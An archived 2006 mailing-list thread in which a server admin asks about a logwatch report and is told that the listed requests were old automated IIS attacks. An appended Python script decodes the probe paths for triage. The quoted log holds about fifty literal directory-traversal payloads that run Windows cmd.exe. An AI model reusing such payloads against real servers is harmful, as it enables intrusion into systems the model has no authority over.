
Date:  Wed, 20 Sep 2006 09:27:40 +0100
From:  "Paul" <paul (at mark) planetcentral.net>
Subject:  [coba-e:07108] Re: Concerned - anything to worry about??
To:  coba-e (at mark) bluequartz.org
Message-Id:  <20060920082721.M52647 (at mark) planetcentral.net>
In-Reply-To:  <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
References:  <4510D8C2.1030206 (at mark) planetcentral.net> <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
X-Mail-Count: 07108

Phew - thanks Darren - much appreciated

On Wed, 20 Sep 2006 08:24:34 +0100, Darren Wolfe wrote
> Hi Paul,
> 
> Nothing to worry about, just some automated attack script for Windows
> servers (and quite an old one by the looks of it, this exploit was closed a
> long time ago IIRC).  You don't have any of these files on your server and
> even if they were they wouldn't execute anyway.
> 
> Another day in the life of a machine on the internet I'm afraid!
> 
> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net] 
> Sent: 20 September 2006 07:00
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07105] Concerned - anything to worry about??
> 
> Checked my logwatch mail this morning and found this - is it anything to 
> worry about???
> I mean I know they were looking for mostly Windows files, but does this 
> mean my system's been compromised ????
> 
> Thx
> Paul
> 
>  total of 1 sites probed the server 
>   www.mydomain.net 218.92.93.181
> 
> !!!! 50 possible successful probes 
>  /cgi-bin/cmd.exe?/c+dir HTTP Response 302 
>  /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/root.exe?/c+dir HTTP Response 302 
>  /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/cmd32.exe?/c+dir HTTP Response 302 
>  /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-Bin/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
> 
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.
> 


--
Open WebMail Project (http://openwebmail.org)
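
How the probe paths in the quoted logwatch report decode, as an added example that is not part of the original thread: it applies a lenient percent/UTF-8 decode (an assumed model of a non-strict legacy decoder) to four lines from the report, with mail-wrapped lines rejoined, and shows that each resolves to a Windows executable and was answered with a 302 redirect. The names `lax_decode`, `triage` and the verdict fields are illustrative.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Four probe lines copied from the logwatch report quoted above.
SAMPLE = """\
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
 /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
 /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
 /scripts/root.exe?/c+dir HTTP Response 302
"""

LINE = re.compile(r"^\s*(\S+) HTTP Response (\d{3})\s*$")
WINDOWS_TARGET = re.compile(r"/(cmd|cmd32|root)\.exe$", re.IGNORECASE)


def lax_decode(raw: bytes) -> str:
    """Decode bytes the way a non-strict UTF-8 parser would: accept overlong
    two-byte sequences and keep only the low six bits of the second byte."""
    out, i = [], 0
    while i < len(raw):
        if 0xC0 <= raw[i] <= 0xDF and i + 1 < len(raw):
            out.append(chr(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(raw[i]))
            i += 1
    return "".join(out)


def triage(line: str):
    """Return a verdict dict for one logwatch probe line, or None if unparsable."""
    m = LINE.match(line)
    if not m:
        return None
    path = m.group(1).split("?", 1)[0]          # drop the "?/c+dir" query
    decoded = lax_decode(unquote_to_bytes(path))
    if "%" in decoded:                           # second pass: double encoding
        decoded = lax_decode(unquote_to_bytes(decoded))
    decoded = decoded.replace("\\", "/")         # treat both separators alike
    status = int(m.group(2))
    return {
        "resolved": posixpath.normpath(decoded),
        "traversal": ".." in decoded.split("/"),
        "windows_target": bool(WINDOWS_TARGET.search(decoded)),
        "redirect_only": 300 <= status < 400,
    }


if __name__ == "__main__":
    for entry in SAMPLE.splitlines():
        print(triage(entry))
```
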

